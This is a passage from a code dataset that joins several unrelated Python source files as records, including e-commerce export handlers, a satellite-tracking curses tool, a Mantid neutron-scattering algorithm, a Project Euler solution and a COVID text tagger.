handle_export_pricebook():\r\n\ttry:\r\n\t\tlist_cur = get_list_currency()\r\n\t\treturn dict(\r\n\t\t\tnow=datetime.datetime.utcnow().isoformat() + \"Z\",\r\n\t\t\tcurrencies=list_cur,\r\n\t\t)\r\n\texcept Exception as e:\r\n\t\treturn str(e)\r\n\r\ndef handle_export_inventory():\r\n\ttry:\r\n\t\tproducts = get_product_master()\r\n\t\tvariants = get_product_variants()\r\n\t\treturn dict(\r\n\t\t\tnow=datetime.datetime.utcnow().isoformat() + \"Z\",\r\n\t\t\tvariants=variants,\r\n\t\t\tproductMaster=products,\r\n\t\t)\r\n\texcept Exception as e:\r\n\t\treturn str(e)\r\n\r\ndef handle_export_category():\r\n\ttry:\r\n\t\tcategories = get_categories()\r\n\t\treturn dict(\r\n\t\t\tnow=datetime.datetime.utcnow().isoformat() + \"Z\",\r\n\t\t\tcategories=categories,\r\n\t\t)\r\n\texcept Exception as e:\r\n\t\treturn str(e)\r\n\r\ndef handle_export_product():\r\n\ttry:\r\n\t\tproducts = get_product_master()\r\n\t\tvariants = get_product_variants()\r\n\t\tproduct_category = 
get_product_category()\r\n\t\treturn dict(\r\n\t\t\tnow=datetime.datetime.utcnow().isoformat() + \"Z\",\r\n\t\t\tproductMaster=products,\r\n\t\t\tproductVariants=variants,\r\n\t\t\tproductCategory=product_category,\r\n\t\t)\r\n\texcept Exception as e:\r\n\t\treturn str(e)\r\n\r\ndef handle_export_recommand():\r\n\ttry:\r\n\t\trelated_products = get_related_product()\r\n\t\treturn dict(\r\n\t\t\tnow=datetime.datetime.utcnow().isoformat() + \"Z\",\r\n\t\t\trelatedProducts=related_products,\r\n\t\t)\r\n\texcept Exception as e:\r\n\t\treturn str(e)\r\n","sub_path":"demandware/func/handle_export.py","file_name":"handle_export.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"551947298","text":"import pandas\nimport numpy\nfrom math import *\n\ndef __init__(path, index):\n    readData(path, index)\n\ndef readData(path, index):\n\n    data = pandas.read_csv(path, index_col=index)\n\n    #\n    temp0 = pandas.Series( 2*data['p0_pt']*data['p1_pt'], index=data.index )\n    temp1 = pandas.Series( data['p0_eta'] - data['p1_eta'], index=data.index )\n    temp1 = numpy.cosh(temp1)\n\n    #data['test0'] = pandas.Series( data['p0_pt'], index=data.index)\n    #data['test1'] = pandas.Series( data['p1_pt'], index=data.index)\n    #data['test2'] = temp0\n    #data['test3'] = temp1\n\n    #data['mttest4'] = numpy.sqrt(temp0 * temp1) \n\n    #print(data)\n\n    return data\n    \n\nif __name__ == \"__main__\":\n    __init__()\n","sub_path":"flavours-of-physics-start/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"459950983","text":"# -*- coding: utf-8 -*-\n# Copyright © 2008-2011 Kozea\n# This file is part of Multicorn, licensed under a 3-clause BSD license.\n\n\nfrom __future__ import print_function\nfrom multicorn.utils import colorize\nfrom multicorn.requests.types import Type, Dict, List\nfrom ... 
import python_executor\nfrom ..abstract import AbstractCorn\nfrom .wrappers import MongoWrapper\n\ntry:\n import pymongo\nexcept ImportError:\n import sys\n print(colorize(\n 'yellow',\n \"WARNING: The Mongo DB AP is not available.\"), file=sys.stderr)\n\n\nclass Mongo(AbstractCorn):\n \"\"\"\n Corn storing items in a Mongo DB noSql server.\n \"\"\"\n\n def __init__(self, name, identity_properties,\n hostname, port, database, collection):\n super(Mongo, self).__init__(name, identity_properties)\n self.hostname = hostname\n self.port = port\n self.database = database\n self.collection_name = collection\n self.register(\"_id\", int)\n\n def bind(self, multicorn):\n super(Mongo, self).bind(multicorn)\n if not hasattr(self.multicorn, '_mongo_metadatas'):\n self.multicorn._mongo_metadatas = {}\n connect_point = \"%s:%s\" % (self.hostname, self.port)\n connection = self.multicorn._mongo_metadatas.get(connect_point, None)\n if connection is None:\n connection = pymongo.Connection(self.hostname, self.port)\n self.multicorn._mongo_metadatas[connect_point] = connection\n self.connection = connection\n self.db = self.connection[self.database]\n self.collection = self.db[self.collection_name]\n\n def register(self, name, type=object, **kwargs):\n self.properties[name] = Type(\n corn=self, name=name, type=type)\n\n def _all(self):\n \"\"\"Return an iterable of all items in the mongo collection.\"\"\"\n for mongo_item in self.collection.find():\n yield self._mongo_to_item(mongo_item)\n\n def delete(self, item):\n self.collection.remove(\n dict((key, value) for key, value in item.items()))\n\n def save(self, item):\n self.collection.save(dict(\n (key, value) for key, value in item.items()\n if not (key == \"_id\" and value is None)))\n item.saved = True\n\n def is_all_mongo(self, request):\n used_types = request.used_types()\n all_requests = reduce(\n lambda x, y: list(x) + list(y), used_types.values(), set())\n return all(\n isinstance(x, MongoWrapper) for x in all_requests)\n\n def _mongo_to_item(self, mongo_item):\n item = {}\n for name in self.properties.keys():\n item[name] = mongo_item[name]\n return self.create(item)\n\n def _execute(self, mrq, return_type):\n result = mrq.execute(self.collection)\n if isinstance(return_type, List):\n if isinstance(return_type.inner_type, Dict):\n if return_type.inner_type.corn:\n def to_items(results):\n for result in results:\n yield self._mongo_to_item(result)\n return to_items(result)\n else:\n return result\n else:\n def to_list(results):\n for mongo_item in result:\n if \"____\" in mongo_item:\n yield mongo_item[\"____\"]\n else:\n yield mongo_item\n return to_list(result)\n elif isinstance(return_type, Dict):\n if return_type.corn:\n return self._mongo_to_item(result)\n elif return_type.type == int:\n return result\n else:\n if \"____\" in result:\n return result[\"____\"]\n return result\n\n def execute(self, request):\n wrapped_request = MongoWrapper.from_request(request)\n if self.is_all_mongo(wrapped_request):\n return self._execute(\n wrapped_request.to_mongo(),\n wrapped_request.return_type())\n else:\n return python_executor.execute(request)\n","sub_path":"multicorn/corns/mongo/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"193996121","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jun 15 15:36:31 2015\r\n\r\n@author: Matthias Maasch\r\n\r\nsource for reading tle 
files:\r\nhttp://blog.thetelegraphic.com/2012/gps-sattelite-tracking-in-python-using-pyephem/\r\n\"\"\"\r\nimport ephem\r\nfrom sys import stdout\r\nfrom datetime import datetime\r\nimport time\r\nimport os\r\nimport numpy as np\r\nimport urllib\r\nimport serial\r\nimport curses\r\n\r\ndegrees_per_radian = 180.0 / np.pi\r\nflag_tracking = 0 # tracking on/off\r\nflag_doppler = 2 # doppler correction off/up/dwn/all\r\ntracked_sat = 0 # number of sat to be tracked\r\n\r\n###################################################################\r\n# load TLE file\r\n###################################################################\r\ndef loadTLE(filename):\r\n \"\"\" Loads a TLE file and creates a list of satellites.\"\"\"\r\n f = open(filename)\r\n satlist = []\r\n l1 = f.readline()\r\n while l1:\r\n l2 = f.readline()\r\n l3 = f.readline()\r\n sat = ephem.readtle(l1,l2,l3)\r\n satlist.append(sat)\r\n #print sat.name\r\n l1 = f.readline()\r\n\r\n f.close()\r\n #print \"%i satellites loaded into list\"%len(satlist)\r\n return satlist\r\n\r\n\r\n\r\n\r\n###################################################################\r\n# Settings\r\n###################################################################\r\nTLE_name = 'amateur.txt'\r\n\r\nhome = ephem.Observer()\r\nhome.lon = '8.625' # +E\r\nhome.lat = '49.8542' # +N\r\nhome.elevation = 60 # meters\r\nf_dwn = 145e6 # satellite frequency in Hz\r\nupdate_intervall = 1 # update intervall in sec\r\n###################################################################\r\n\r\n\r\n###################################################################\r\n# Main function\r\n###################################################################\r\n# open serial port\r\n#comport = serial.Serial('/dev/tty.usbserial-A800ekX6',9600)\r\n\r\n# download latest TLE file from server\r\nprint('\\nDownloading TLE files from server: http://www.celestrak.com/NORAD/elements/%s' % TLE_name)\r\nurllib.urlretrieve('http://www.celestrak.com/NORAD/elements/%s' % TLE_name, TLE_name)\r\n#time.sleep(2)\r\n\r\n# load TLE file and save satellite data in variable \r\nsats = loadTLE(TLE_name)\r\n\r\n# initialize the screen etc.\r\nscr = curses.initscr()\r\nscr = curses.newwin(200, 100, 0, 0)\r\ncurses.halfdelay(int(update_intervall*10))\r\ncurses.noecho()\r\ncurses.curs_set(0)\r\n\r\nscr.addstr(1,0,' SATELLITE TRACKING observer: N%2.4f E%3.4f ' % (home.lat * degrees_per_radian, home.long * degrees_per_radian))\r\nscr.addstr(4,0,' ----------------------------------------------------------------------------')\r\nscr.addstr(5,0,' NORAD Satellite EL AZ veloc f_rx ')\r\nscr.addstr(6,0,' ----------------------------------------------------------------------------')\r\nscr.addstr(7+len(sats),0,' ----------------------------------------------------------------------------')\r\nscr.addstr(8+len(sats),0,' (S)elect Satellite (T)racking on/off (Q)uit')\r\nscr.addstr(9+len(sats),0,' (U)plink Frequency (D)ownlink Frequency (C)orrect Doppler: up/dwn')\r\n\r\nwhile True:\r\n home.date = datetime.utcnow()\r\n scr.addstr(2,0,' %sUTC downlink: %8.3fMHz ' % (home.date, f_dwn/1e6))\r\n scr.addstr(3,0,' %s' % TLE_name)\r\n scr.addstr(3,36,' uplink: %8.3fMHz' % (f_dwn/1e6))\r\n# visualize settings\r\n # tracking\r\n if (flag_tracking == 1) and tracked_sat:\r\n scr.addstr(8+len(sats),32,'on', curses.A_UNDERLINE)\r\n scr.addstr(8+len(sats),35,'off')\r\n else:\r\n scr.addstr(8+len(sats),32,'on')\r\n scr.addstr(8+len(sats),35,'off', curses.A_UNDERLINE)\r\n # doppler\r\n if flag_doppler == 3:\r\n 
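# mode 3 corrects both up- and downlink, so 'up/dwn' is underlined\r\n        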
scr.addstr(9+len(sats),62,'up/dwn', curses.A_UNDERLINE)\r\n elif flag_doppler == 2:\r\n scr.addstr(9+len(sats),62,'up')\r\n scr.addstr(9+len(sats),65,'dwn', curses.A_UNDERLINE)\r\n elif flag_doppler == 1:\r\n scr.addstr(9+len(sats),62,'up', curses.A_UNDERLINE)\r\n scr.addstr(9+len(sats),65,'dwn')\r\n else:\r\n scr.addstr(9+len(sats),62,'up/dwn')\r\n scr.refresh()\r\n# show all satellite data\r\n for n in range(0,len(sats)):\r\n sats[n].compute(home)\r\n f_rx = f_dwn/(1+sats[n].range_velocity/3.0e8)\r\n scr.addstr(7+n,1,' %2d %5d %25s %5.1f %5.1f %6.0f %8.3f ' % (n+1, sats[n].catalog_number, sats[n].name, sats[n].alt * degrees_per_radian, sats[n].az * degrees_per_radian, sats[n].range_velocity, f_rx/1e6))\r\n if sats[n].alt>=0:\r\n scr.addstr(7+n,14,' %25s %5.1f %5.1f ' % (sats[n].name, sats[n].alt * degrees_per_radian, sats[n].az * degrees_per_radian), curses.A_STANDOUT)\r\n if n == tracked_sat-1:\r\n scr.addstr(7+n,1,' %2d %5d %25s %5.1f %5.1f %6.0f %8.3f ' % (n+1, sats[n].catalog_number, sats[n].name, sats[n].alt * degrees_per_radian, sats[n].az * degrees_per_radian, sats[n].range_velocity, f_rx/1e6), curses.A_STANDOUT)\r\n# check input key command \r\n char = scr.getch()\r\n # quit\r\n if char == ord('q'):\r\n curses.echo()\r\n scr.keypad(0)\r\n curses.nocbreak()\r\n curses.endwin()\r\n exit()\r\n # select satellite\r\n elif char == ord('s'):\r\n curses.curs_set(1)\r\n curses.echo()\r\n scr.addstr(11+len(sats),1,'enter satellite number:')\r\n tracked_sat = int(scr.getstr(11+len(sats),25))\r\n if (tracked_sat < len(sats)+1) and (tracked_sat > 0):\r\n tracked_sat == tracked_sat\r\n else:\r\n tracked_sat = 0\r\n flag_tracking = 0\r\n flag_tracking = 0 # prevent positioner from suddenly moving when satellite is changed\r\n curses.curs_set(0)\r\n curses.noecho()\r\n scr.addstr(11+len(sats),1,' ')\r\n curses.halfdelay(int(update_intervall*10))\r\n #scr.refresh() \r\n # toggle tracking\r\n elif char == ord('t'):\r\n flag_tracking = 1 - flag_tracking\r\n # toggle doppler correction\r\n elif char == ord('c'):\r\n if flag_doppler == 0:\r\n flag_doppler = 1\r\n elif flag_doppler == 1:\r\n flag_doppler = 2\r\n elif flag_doppler == 2:\r\n flag_doppler = 3\r\n elif flag_doppler == 3:\r\n flag_doppler = 0\r\n elif char != curses.ERR: # This is true if the user pressed something\r\n scr.addstr(11+len(sats), 0, \" pressed %s \" % char, curses.A_STANDOUT)\r\n else:\r\n scr.addstr(11+len(sats), 0, \" %d \" % tracked_sat)\r\n","sub_path":"track.py","file_name":"track.py","file_ext":"py","file_size_in_byte":6525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"30598180","text":"import json, urllib\r\n\r\nclass contriesIteration():\r\n\r\n def __init__(self, write_file, json_file):\r\n self.index = -1\r\n self.write_file = open(write_file, \"w\", encoding=\"UTF-8\")\r\n with open(json_file, \"r\", encoding=\"UTF-8\") as f:\r\n self.file = json.loads(f.read())\r\n\r\n\r\n def __iter__(self):\r\n return self\r\n\r\n def __next__(self):\r\n self.index += 1\r\n url = \"https://ru.wikipedia.org/wiki/\" + self.file[self.index][\"name\"][\"official\"].replace(\" \", \"_\")\r\n print(url)\r\n self.write_file.write(url + \" - \" + self.file[self.index][\"name\"][\"official\"] + \"\\n\")\r\n try:\r\n self.file[self.index + 1]\r\n except:\r\n self.write_file.close()\r\n raise StopIteration\r\n return url\r\n\r\n\r\nmy_class = contriesIteration()\r\nj = 0\r\nfor i in my_class:\r\n j +=1\r\n print(j)","sub_path":"домашка 
1.2/номер1.py","file_name":"номер1.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"531085631","text":"from glob import glob\nimport os\n\ndef Print(dir):\n\tinclude_root = '../Include/'\n\twith open(include_root + dir+'.hpp', 'w') as f:\n\t\tprint(\"#pragma once\", file=f)\n\t\tprint('', file=f)\n\t\tfor x in glob(include_root + dir+\"/**/*.hpp\", recursive=True):\n\t\t\tx = os.path.relpath(x, include_root)\n\t\t\tx = x.replace('\\\\', '/')\n\t\t\tprint(f\"#include \\\"{x}\\\"\", file=f)\n\nPrint(\"FishEngine\")\nPrint(\"FishEditor\")","sub_path":"Scripts/get_all_headers.py","file_name":"get_all_headers.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"340673136","text":"#pylint: disable=no-init,too-many-instance-attributes\nfrom __future__ import (absolute_import, division, print_function)\nfrom mantid.simpleapi import *\nfrom mantid.api import (PythonAlgorithm, AlgorithmFactory, MatrixWorkspaceProperty,\n ITableWorkspaceProperty, PropertyMode, Progress)\nfrom mantid.kernel import Direction, logger\nfrom mantid import config\nimport math\nimport os\n\n\nclass TransformToIqt(PythonAlgorithm):\n\n _sample = None\n _resolution = None\n _e_min = None\n _e_max = None\n _e_width = None\n _number_points_per_bin = None\n _parameter_table = None\n _output_workspace = None\n _dry_run = None\n\n\n def category(self):\n return \"Workflow\\\\Inelastic;Workflow\\\\MIDAS\"\n\n\n def summary(self):\n return 'Transforms an inelastic reduction to I(Q, t)'\n\n\n def PyInit(self):\n self.declareProperty(MatrixWorkspaceProperty('SampleWorkspace', '',\n optional=PropertyMode.Mandatory,\n direction=Direction.Input),\n doc=\"Name for the sample workspace.\")\n\n self.declareProperty(MatrixWorkspaceProperty('ResolutionWorkspace', '',\n optional=PropertyMode.Mandatory,\n direction=Direction.Input),\n doc=\"Name for the resolution workspace.\")\n\n self.declareProperty(name='EnergyMin', defaultValue=-0.5,\n doc='Minimum energy for fit. Default=-0.5')\n self.declareProperty(name='EnergyMax', defaultValue=0.5,\n doc='Maximum energy for fit. Default=0.5')\n self.declareProperty(name='BinReductionFactor', defaultValue=10.0,\n doc='Decrease total number of spectrum points by this ratio through merging of '\n 'intensities from neighbouring bins. 
Default=1')\n\n self.declareProperty(ITableWorkspaceProperty('ParameterWorkspace', '',\n direction=Direction.Output,\n optional=PropertyMode.Optional),\n doc='Table workspace for saving TransformToIqt properties')\n\n self.declareProperty(MatrixWorkspaceProperty('OutputWorkspace', '',\n direction=Direction.Output,\n optional=PropertyMode.Optional),\n doc='Output workspace')\n\n self.declareProperty(name='DryRun', defaultValue=False,\n doc='Only calculate and output the parameters')\n\n\n def PyExec(self):\n self._setup()\n\n self._calculate_parameters()\n\n if not self._dry_run:\n self._transform()\n\n self._add_logs()\n\n else:\n skip_prog = Progress(self, start=0.3, end=1.0, nreports=2)\n skip_prog.report('skipping transform')\n skip_prog.report('skipping add logs')\n logger.information('Dry run, will not run TransformToIqt')\n\n self.setProperty('ParameterWorkspace', self._parameter_table)\n self.setProperty('OutputWorkspace', self._output_workspace)\n\n\n def _setup(self):\n \"\"\"\n Gets algorithm properties.\n \"\"\"\n\n from IndirectCommon import getWSprefix\n\n self._sample = self.getPropertyValue('SampleWorkspace')\n self._resolution = self.getPropertyValue('ResolutionWorkspace')\n\n self._e_min = self.getProperty('EnergyMin').value\n self._e_max = self.getProperty('EnergyMax').value\n self._number_points_per_bin = self.getProperty('BinReductionFactor').value\n\n self._parameter_table = self.getPropertyValue('ParameterWorkspace')\n if self._parameter_table == '':\n self._parameter_table = getWSprefix(self._sample) + 'TransformToIqtParameters'\n\n self._output_workspace = self.getPropertyValue('OutputWorkspace')\n if self._output_workspace == '':\n self._output_workspace = getWSprefix(self._sample) + 'iqt'\n\n self._dry_run = self.getProperty('DryRun').value\n\n\n def validateInputs(self):\n \"\"\"\n Validate input properties.\n \"\"\"\n issues = dict()\n\n e_min = self.getProperty('EnergyMin').value\n e_max = self.getProperty('EnergyMax').value\n\n # Check for swapped energy values\n if e_min > e_max:\n energy_swapped = 'EnergyMin is greater than EnergyMax'\n issues['EnergyMin'] = energy_swapped\n issues['EnergyMax'] = energy_swapped\n\n return issues\n\n\n def _calculate_parameters(self):\n \"\"\"\n Calculates the TransformToIqt parameters and saves in a table workspace.\n \"\"\"\n workflow_prog = Progress(self, start=0.0, end=0.3, nreports=8)\n workflow_prog.report('Croping Workspace')\n CropWorkspace(InputWorkspace=self._sample,\n OutputWorkspace='__TransformToIqt_sample_cropped',\n Xmin=self._e_min,\n Xmax=self._e_max)\n workflow_prog.report('Calculating table properties')\n x_data = mtd['__TransformToIqt_sample_cropped'].readX(0)\n number_input_points = len(x_data) - 1\n num_bins = int(number_input_points / self._number_points_per_bin)\n self._e_width = (abs(self._e_min) + abs(self._e_max)) / num_bins\n\n workflow_prog.report('Attemping to Access IPF')\n try:\n workflow_prog.report('Access IPF')\n instrument = mtd[self._sample].getInstrument()\n\n analyserName = instrument.getStringParameter('analyser')[0]\n analyser = instrument.getComponentByName(analyserName)\n\n if analyser is not None:\n logger.debug('Found %s component in instrument %s, will look for resolution there'\n % (analyserName, instrument))\n resolution = analyser.getNumberParameter('resolution')[0]\n else:\n logger.debug('No %s component found on instrument %s, will look for resolution in top level instrument'\n % (analyserName, instrument))\n resolution = instrument.getNumberParameter('resolution')[0]\n\n 
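# resolution found in the instrument parameter file (IPF)\n            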
logger.information('Got resolution from IPF: %f' % resolution)\n workflow_prog.report('IPF resolution obtained')\n except (AttributeError, IndexError):\n workflow_prog.report('Resorting to Default')\n resolution = 0.0175\n logger.warning('Could not get resolution from IPF, using default value: %f' % (resolution))\n\n resolution_bins = int(round((2 * resolution) / self._e_width))\n\n if resolution_bins < 5:\n logger.warning('Resolution curve has <5 points. Results may be unreliable.')\n\n workflow_prog.report('Creating Parameter table')\n param_table = CreateEmptyTableWorkspace(OutputWorkspace=self._parameter_table)\n\n workflow_prog.report('Populating Parameter table')\n param_table.addColumn('int', 'SampleInputBins')\n param_table.addColumn('float', 'BinReductionFactor')\n param_table.addColumn('int', 'SampleOutputBins')\n param_table.addColumn('float', 'EnergyMin')\n param_table.addColumn('float', 'EnergyMax')\n param_table.addColumn('float', 'EnergyWidth')\n param_table.addColumn('float', 'Resolution')\n param_table.addColumn('int', 'ResolutionBins')\n\n param_table.addRow([number_input_points, self._number_points_per_bin, num_bins,\n self._e_min, self._e_max, self._e_width,\n resolution, resolution_bins])\n\n workflow_prog.report('Deleting temp Workspace')\n DeleteWorkspace('__TransformToIqt_sample_cropped')\n\n self.setProperty('ParameterWorkspace', param_table)\n\n\n def _add_logs(self):\n sample_logs = [('iqt_sample_workspace', self._sample),\n ('iqt_resolution_workspace', self._resolution),\n ('iqt_binning', '%f,%f,%f' % (self._e_min, self._e_width, self._e_max))]\n\n log_alg = self.createChildAlgorithm(name='AddSampleLogMultiple', startProgress=0.8,\n endProgress=1.0, enableLogging=True)\n log_alg.setProperty('Workspace', self._output_workspace)\n log_alg.setProperty('LogNames',[item[0] for item in sample_logs])\n log_alg.setProperty('LogValues', [item[1] for item in sample_logs])\n log_alg.execute()\n\n\n def _transform(self):\n \"\"\"\n Run TransformToIqt.\n \"\"\"\n from IndirectCommon import CheckHistZero, CheckHistSame, CheckAnalysers\n trans_prog = Progress(self, start=0.3, end=0.8, nreports=15)\n try:\n CheckAnalysers(self._sample, self._resolution)\n except ValueError:\n # A genuine error the shows that the two runs are incompatible\n raise\n except:\n # Checking could not be performed due to incomplete or no instrument\n logger.warning('Could not check for matching analyser and reflection')\n\n # Process resolution data\n num_res_hist = CheckHistZero(self._resolution)[0]\n if num_res_hist > 1:\n CheckHistSame(self._sample, 'Sample', self._resolution, 'Resolution')\n\n rebin_param = str(self._e_min) + ',' + str(self._e_width) + ',' + str(self._e_max)\n trans_prog.report('Rebinning Workspace')\n Rebin(InputWorkspace=self._sample,\n OutputWorkspace='__sam_data',\n Params=rebin_param,\n FullBinsOnly=True)\n\n # Sample\n trans_prog.report('Rebinning sample')\n Rebin(InputWorkspace='__sam_data',\n OutputWorkspace='__sam_data',\n Params=rebin_param)\n trans_prog.report('Integrating Sample')\n Integration(InputWorkspace='__sam_data',\n OutputWorkspace='__sam_int')\n trans_prog.report('Converting Sample to data points')\n ConvertToPointData(InputWorkspace='__sam_data',\n OutputWorkspace='__sam_data')\n trans_prog.report('Extracting FFT spectrum for Sample')\n ExtractFFTSpectrum(InputWorkspace='__sam_data',\n OutputWorkspace='__sam_fft',\n FFTPart=2)\n trans_prog.report('Dividing Sample')\n Divide(LHSWorkspace='__sam_fft',\n RHSWorkspace='__sam_int',\n OutputWorkspace='__sam')\n\n 
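# the resolution workspace gets the same rebin/integrate/FFT/divide treatment as the sample\n        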
# Resolution\n        trans_prog.report('Rebinning Resolution')\n        Rebin(InputWorkspace=self._resolution,\n              OutputWorkspace='__res_data',\n              Params=rebin_param)\n        trans_prog.report('Integrating Resolution')\n        Integration(InputWorkspace='__res_data',\n                    OutputWorkspace='__res_int')\n        trans_prog.report('Converting Resolution to data points')\n        ConvertToPointData(InputWorkspace='__res_data',\n                           OutputWorkspace='__res_data')\n        trans_prog.report('Extracting FFT Resolution spectrum')\n        ExtractFFTSpectrum(InputWorkspace='__res_data',\n                           OutputWorkspace='__res_fft',\n                           FFTPart=2)\n        trans_prog.report('Dividing Resolution')\n        Divide(LHSWorkspace='__res_fft',\n               RHSWorkspace='__res_int',\n               OutputWorkspace='__res')\n\n        trans_prog.report('Dividing Workspaces')\n        Divide(LHSWorkspace='__sam',\n               RHSWorkspace='__res',\n               OutputWorkspace=self._output_workspace)\n\n        # Cleanup sample workspaces\n        trans_prog.report('Deleting Sample temp')\n        DeleteWorkspace('__sam_data')\n        DeleteWorkspace('__sam_int')\n        DeleteWorkspace('__sam_fft')\n        DeleteWorkspace('__sam')\n\n        # Crop nonsense values off workspace\n        binning = int(math.ceil(mtd[self._output_workspace].blocksize() / 2.0))\n        bin_v = mtd[self._output_workspace].dataX(0)[binning]\n        trans_prog.report('Cropping output')\n        CropWorkspace(InputWorkspace=self._output_workspace,\n                      OutputWorkspace=self._output_workspace,\n                      XMax=bin_v)\n\n        # Set Y axis unit and label\n        mtd[self._output_workspace].setYUnit('')\n        mtd[self._output_workspace].setYUnitLabel('Intensity')\n\n        trans_prog.report('Deleting Resolution temp')\n        # Clean up resolution workspaces\n        DeleteWorkspace('__res_data')\n        DeleteWorkspace('__res_int')\n        DeleteWorkspace('__res_fft')\n        DeleteWorkspace('__res')\n\n\n# Register algorithm with Mantid\nAlgorithmFactory.subscribe(TransformToIqt)\n","sub_path":"Framework/PythonInterface/plugins/algorithms/WorkflowAlgorithms/TransformToIqt.py","file_name":"TransformToIqt.py","file_ext":"py","file_size_in_byte":12848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"602210016","text":"def as_factorization(number):\n    if number == 1:\n        
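# base case: 1 has an empty prime factorization\n        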
return {}\n for p in [2, 3, 5, 7]:\n if 0 == number % p:\n ret = as_factorization(number // p)\n ret[p] = ret.get(p, 0) + 1\n return ret\n return {number: 1}\n\n\ndef as_number(factorization):\n ret = 1\n for p, exp in factorization.items():\n ret *= p ** exp\n return ret\n\n\ndef is_square_free(factorization):\n return max(factorization.values(), default=0) <= 1\n\n\nbinomial_coefficient_cache = {}\n\n\ndef binomial_coefficient(n, k):\n if k == 0 or k == n:\n return {}\n if (n, k) in binomial_coefficient_cache:\n return binomial_coefficient_cache[(n, k)]\n ret = binomial_coefficient(n - 1, k - 1).copy()\n for p, exp in as_factorization(n).items():\n ret[p] = ret.get(p, 0) + exp\n for p, exp in as_factorization(k).items():\n ret[p] -= exp\n binomial_coefficient_cache[(n, k)] = ret\n return ret\n\n\ngood_numbers = set()\nfor n in range(51):\n for k in range(n + 1):\n binomial = binomial_coefficient(n, k)\n if is_square_free(binomial):\n good_numbers.add(as_number(binomial))\nans = sum(good_numbers)\n\nassert 34029210557338 == ans\n","sub_path":"p203.py","file_name":"p203.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"631781457","text":"# -*- coding: utf-8 -*-\nimport os\nfrom goose.Configuration import Configuration\nfrom goose.Crawler import CrawlCandidate\nfrom goose.Crawler import Crawler\nfrom goose.Article import Article\n\nclass Goose(object):\n \"\"\"\\\n \n \"\"\"\n def __init__(self, config=None):\n self.config = config or Configuration()\n self.initializeEnvironment()\n \n \n def extractContent(self, url=None, rawHTML=None):\n \"\"\"\\\n Main method to extract an article object from a URL, \n pass in a url and get back a Article\n \"\"\"\n cc = CrawlCandidate(self.config, url, rawHTML)\n return self.sendToActor(cc)\n \n \n def shutdownNetwork(self):\n pass\n \n \n def sendToActor(self, crawlCandiate):\n crawler = Crawler(self.config)\n article = crawler.crawl(crawlCandiate)\n return article\n \n \n def initializeEnvironment(self):\n # test if config.localStoragePath\n # is a directory\n if not os.path.isdir(self.config.localStoragePath):\n os.makedirs(self.config.localStoragePath)\n \n if not os.path.isdir(self.config.localStoragePath):\n raise Exception(self.config.localStoragePath + \n \" directory does not seem to exist, \"\n \"you need to set this for image processing downloads\"\n )\n \n # test to write a dummy file to the directory\n # to check is directory is writtable\n path = '%s/test.txt' % self.config.localStoragePath\n try:\n f = open(path, 'w')\n f.close()\n os.remove(path)\n except IOError:\n raise Exception(self.config.localStoragePath + \n \" directory is not writeble, \"\n \"you need to set this for image processing downloads\"\n )\n \n \n \n ","sub_path":"goose/Goose.py","file_name":"Goose.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"170137766","text":"import sys, os, pathlib, json\nfrom os import listdir\nfrom os.path import isfile, join\n\ndicts = {}\n\ndef path_to_paper_id(path):\n return path.split(\"/\")[-1][:-5] #cutting last 5 cuts \".json\"\n\ndef read_article(path):\n with open(path) as f:\n d = json.load(f)\n title_data = [d[\"metadata\"][\"title\"]]\n abstract_data = [a[\"text\"] for a in d[\"abstract\"]]\n body_text_data = [t[\"text\"] for t in d[\"body_text\"]] #a list of all text sections in article\n\n\n return [title_data, abstract_data, 
body_text_data] #\n\ndef read_meta(paperid):\n metafile = open(\"meta_subset_100.csv\", \"r\")\n for line in metafile:\n if paperid in line:\n metaline = line.split(\",\")\n coord_uid = metaline[0]\n sourcedb = metaline[2]\n sourceid = metaline[5]\n return [coord_uid, sourcedb, sourceid]\n\ndef setup_dicts():\n covid19_list = [line for line in open (\"Supplemental_file2.txt\")]\n sars_list = [line for line in open(\"Supplemental_file1.txt\")]\n\n dicts[\"covid19\"] = covid19_list\n dicts[\"sars\"] = sars_list\n \n\ndef tag_article(article_path):\n article = read_article(article_path)\n section_nr = 0\n denotated_sections = []\n\n for section in article:\n denotations = []\n for subsection in section:\n for id in dicts.keys():\n for phrase in dicts[id]:\n begin = subsection.find(\"virus\")\n if begin > 0:#found phrase\n end = begin + len(phrase)\n info = {\"id\": id, \"span\":{\"begin\":begin, \"end\":end}, \"obj\":\"?\"}\n denotations.append(info)\n denotated_sections.append(denotations)\n return denotated_sections\n\ndef generate_JSONs(denotated_sections):\n for filenr in range(20):\n with open(\"result.json\" + str(filenr), \"w\") as fp:\n json.dump(denotated_sections[filenr], fp)\n\n\n\n\ndef main():\n subset_path = os.path.abspath(\"comm_use_subset_100\") + \"/\"\n comm_use_subset_100 = [f for f in listdir(subset_path) if isfile(join(subset_path, f))]\n fileonepath = subset_path + comm_use_subset_100[0]\n setup_dicts()\n\n denot_sections = tag_article(fileonepath)\n generate_JSONs(denot_sections)\n \nif __name__ == '__main__':\n main()\n \n\n","sub_path":"tagger.py","file_name":"tagger.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"569008219","text":"import matplotlib.image as mpimg\nimport numpy as np\nimport glob\nimport time\nimport pickle\nfrom sklearn.svm import LinearSVC\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import 